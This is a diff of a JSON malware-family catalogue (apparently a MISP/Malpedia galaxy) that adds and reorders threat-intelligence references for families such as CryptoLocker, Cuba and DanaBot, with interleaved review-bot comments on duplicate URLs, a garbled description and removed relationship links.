- "https://content.fireeye.com/apt-41/rpt-apt41/"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/"
],
"synonyms": [
"Motnug",
@@ -18726,13 +19891,26 @@
"uuid": "7ca7c08b-36fd-46b3-8b9e-a8b0d4743433",
"value": "CROSSWALK"
},
+ {
+ "description": "According to Trend Micro, this is a custom loader for win.cobalt_strike, used by Earth Longzhi (a subgroup of APT41).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader",
+ "https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48d697ec-aa34-4d98-83e4-17b736d59a85",
+ "value": "Croxloader"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch",
- "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/"
],
"synonyms": [],
"type": []
@@ -18745,18 +19923,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl",
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
"https://twitter.com/demonslay335/status/971164798376468481",
+ "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
"https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
+ "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300",
+ "https://twitter.com/albertzsigovits/status/1217866089964679174",
+ "https://hackmag.com/security/ransomware-russian-style/",
"https://twitter.com/bartblaze/status/1305197264332369920",
"https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html",
- "https://twitter.com/albertzsigovits/status/1217866089964679174",
- "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/",
- "https://hackmag.com/security/ransomware-russian-style/",
- "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
- "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
- "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300",
"https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/",
"https://securelist.com/cis-ransomware/104452/"
],
"synonyms": [
@@ -18784,8 +19963,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
+ "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/"
],
"synonyms": [],
"type": []
@@ -18811,18 +19990,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot",
- "https://asec.ahnlab.com/en/26052/",
- "https://asec.ahnlab.com/en/31683/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.mandiant.com/resources/russian-targeting-gov-business",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/",
- "https://asec.ahnlab.com/en/24423/",
+ "https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html",
"https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf",
- "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/",
"https://asec.ahnlab.com/en/35981/",
+ "https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf",
+ "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/",
+ "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/",
+ "https://asec.ahnlab.com/en/31683/",
+ "https://asec.ahnlab.com/en/31802/",
+ "https://asec.ahnlab.com/en/24423/",
+ "https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/",
+ "https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://fr3d.hk/blog/cryptbot-too-good-to-be-true",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://asec.ahnlab.com/en/26052/",
"https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger",
- "https://fr3d.hk/blog/cryptbot-too-good-to-be-true"
+ "https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer"
],
"synonyms": [],
"type": []
@@ -18843,6 +20028,19 @@
"uuid": "972fbb7b-6945-42d8-ba88-a7b4e6fc1ad4",
"value": "CrypticConvo"
},
+ {
+ "description": "According to OALabs, this ransomware has the following features: \r\n* Files are encrypted with AES CBC using a generated 256 bit key and IV.\r\n* The generated AES keys are encrypted using a hard coded RSA key and appended to the encrypted files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptnet",
+ "https://research.openanalysis.net/dotnet/cryptnet/ransomware/2023/04/20/cryptnet.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "99c468a2-c69f-4c9c-9941-0627052001b2",
+ "value": "CryptNET"
+ },
{
"description": "",
"meta": {
@@ -18858,21 +20056,36 @@
"uuid": "c6d09bb2-5673-4b2b-b2cb-5d14f2568189",
"value": "CryptoDarkRubix"
},
+ {
+ "description": "CryptoJoker is an open source ransomware written in C#.\r\nCryptoJoker uses a combination of a \"custom XOR\" encryption and RSA. A private public/private pair key is generated for every computer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptojoker",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/plutocrypt-a-cryptojoker-ransomware-variant"
+ ],
+ "synonyms": [
+ "PlutoCrypt"
+ ],
+ "type": []
+ },
+ "uuid": "01cb8122-7a24-436f-85d3-d6a306800f10",
+ "value": "CryptoJoker"
+ },
{
"description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
"https://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.secureworks.com/research/cryptolocker-ransomware",
"https://sites.temple.edu/care/ci-rw-attacks/",
"http://www.secureworks.com/research/threat-profiles/gold-evergreen",
- "https://www.secureworks.com/research/cryptolocker-ransomware",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware"
],
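Review bot: "A private public/private pair key is generated for every computer." in the new CryptoJoker description is garbled and should read "A public/private key pair is generated for every computer." Both this description and CryptNET's in the previous hunk embed literal \r\n sequences and "* " bullet markers, so check that the galaxy renderers handle CRLF and markdown, or normalise them in the generator rather than per entry. In the CryptoLocker refs, https://www.secureworks.com/research/threat-profiles/gold-evergreen and http://www.secureworks.com/research/threat-profiles/gold-evergreen are the same page under two schemes and both survive the reorder; drop the http one.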
"synonyms": [],
"type": []
@@ -18898,11 +20111,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix",
+ "https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/",
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
"https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/",
- "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/",
- "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/"
+ "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/"
],
"synonyms": [
+ "Azer",
"CryptFile2"
],
"type": []
@@ -18941,8 +20156,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield",
- "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/",
- "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/"
+ "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/",
+ "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/"
],
"synonyms": [],
"type": []
@@ -18968,9 +20183,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall",
- "https://sites.temple.edu/care/ci-rw-attacks/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f"
+ "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f",
+ "https://sites.temple.edu/care/ci-rw-attacks/"
],
"synonyms": [],
"type": []
@@ -18996,8 +20211,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress",
- "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/",
- "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html"
+ "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html",
+ "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/"
],
"synonyms": [],
"type": []
@@ -19023,8 +20238,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx",
- "https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
+ "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/",
+ "https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/"
],
"synonyms": [],
"type": []
@@ -19032,6 +20247,19 @@
"uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8",
"value": "CryptXXXX"
},
+ {
+ "description": "Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c7fb0acb-018b-47eb-8555-5a0291e2505e",
+ "value": "Crytox"
+ },
{
"description": "",
"meta": {
@@ -19050,9 +20278,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://samvartaka.github.io/malware/2015/11/20/ctb-locker",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://samvartaka.github.io/malware/2015/11/20/ctb-locker"
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/"
],
"synonyms": [],
"type": []
@@ -19065,24 +20293,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba",
- "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/",
- "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf",
- "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/",
- "https://www.mandiant.com/resources/unc2596-cuba-ransomware",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more",
- "https://www.ic3.gov/Media/News/2021/211203-2.pdf",
- "https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware",
- "https://lab52.io/blog/cuba-ransomware-analysis/",
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/",
+ "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf",
"https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html",
- "https://blog.group-ib.com/hancitor-cuba-ransomware"
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/",
+ "https://lab52.io/blog/cuba-ransomware-analysis/",
+ "https://www.mandiant.com/resources/unc2596-cuba-ransomware",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware",
+ "https://www.ic3.gov/Media/News/2021/211203-2.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/",
+ "https://blog.group-ib.com/hancitor-cuba-ransomware",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf",
+ "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html",
+ "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis",
+ "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/",
+ "https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/",
+ "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/"
],
"synonyms": [
"COLDDRAW"
@@ -19097,9 +20327,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe",
- "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal",
+ "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
"http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html",
- "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
+ "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal"
],
"synonyms": [],
"type": []
@@ -19125,10 +20355,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.curator",
- "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf"
+ "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf",
+ "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/",
+ "https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/"
],
"synonyms": [
- "Ever101"
+ "Ever101",
+ "SunnyDay"
],
"type": []
},
@@ -19153,9 +20386,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
"https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
"https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
"http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html"
],
"synonyms": [],
@@ -19169,20 +20402,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://darknetdiaries.com/episode/110/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
"https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
- "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
- "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/",
- "http://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://darknetdiaries.com/episode/110/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
"https://www.secureworks.com/research/threat-profiles/gold-essex",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/"
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
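Review bot: the re-added http://www.secureworks.com/research/threat-profiles/gold-essex duplicates the https://www.secureworks.com/research/threat-profiles/gold-essex line kept further down, and the mcafee.com and securingtomorrow.mcafee.com copies of the sandbox-evasion retrospective are one article on two hosts. Normalising scheme and host before emitting the array would remove these near-duplicates instead of shuffling them around on every refresh.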
"synonyms": [],
"type": []
@@ -19195,29 +20428,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate",
- "https://citizenlab.ca/2015/12/packrat-report/",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://www.subexsecure.com/pdf/malware-reports/2021-05/cybergate-threat-report.pdf",
"https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.subexsecure.com/pdf/malware-reports/2021-05/cybergate-threat-report.pdf",
+ "https://citizenlab.ca/2015/12/packrat-report/",
+ "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
+ "https://sectrio.com/wp-content/uploads/2021/08/cybergate-threat-report.pdf",
"https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns"
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
],
"synonyms": [
"Rebhip"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f6e6540e-c21f-4202-ac46-185e735215db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d",
"value": "CyberGate"
},
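Review bot: deleting the "related" block removes CyberGate's similar-to link to dest-uuid f6e6540e-c21f-4202-ac46-185e735215db with nothing replacing it, and Dairy and DarkComet lose their links the same way further down. Relationship edges are a semantic change, not a refs refresh; the change description should say whether the generator stopped emitting relations or the target clusters were retired, and if this is an accidental side-effect, restore the blocks.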
@@ -19251,8 +20476,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat",
- "https://www.gdatasoftware.com/blog/cyrat-ransomware",
- "https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html"
+ "https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html",
+ "https://www.gdatasoftware.com/blog/cyrat-ransomware"
],
"synonyms": [],
"type": []
@@ -19278,13 +20503,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
- "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
- "https://www.sygnia.co/mata-framework",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://malwareandstuff.com/peb-where-magic-is-stored/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://blogs.vmware.com/security/2022/11/threat-analysis-active-c2-discovery-using-protocol-emulation-part4-dacls-aka-mata.html",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [
"MATA"
@@ -19299,11 +20525,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke",
+ "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts",
"https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/",
+ "https://twitter.com/a_tweeter_user/status/1154764787823316993",
"https://twitter.com/ClearskySec/status/1110941178231484417",
"https://www.youtube.com/watch?v=vx9IB88wXSE",
- "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts",
- "https://twitter.com/a_tweeter_user/status/1154764787823316993",
"https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9"
],
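Review bot: https://twitter.com/a_tweeter_user/status/1154764787823316993 looks like a placeholder handle rather than a real account; Twitter resolves status URLs by ID so the link may still work, but the real handle should be recorded while this line is being moved anyway.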
"synonyms": [],
@@ -19318,11 +20544,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache",
"https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a",
+ "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign",
"https://twitter.com/killamjr/status/1204584085395517440",
- "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97",
- "https://twitter.com/cyb3rops/status/1199978327697694720",
"https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html",
- "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign"
+ "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97",
+ "https://twitter.com/cyb3rops/status/1199978327697694720"
],
"synonyms": [],
"type": []
@@ -19340,15 +20566,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2a56538f-7c21-44b3-b438-5baa025ed005",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601",
"value": "Dairy"
},
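Review bot: this hunk does nothing but delete Dairy's "related" link to 2a56538f-7c21-44b3-b438-5baa025ed005 (type similar, likelihood almost-certain); as with CyberGate above, confirm the relationship removal is intended and not a generator regression.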
@@ -19357,45 +20574,47 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://research.checkpoint.com/danabot-demands-a-ransom-payment/",
- "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense",
- "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor",
- "https://security-soup.net/decoding-a-danabot-downloader/",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot",
- "https://blog.lexfo.fr/danabot-malware.html",
- "https://www.mandiant.com/resources/supply-chain-node-js",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
- "https://twitter.com/f0wlsec/status/1459892481760411649",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service",
- "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
- "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
"https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/",
+ "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
"https://asert.arbornetworks.com/danabots-travels-a-global-perspective/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
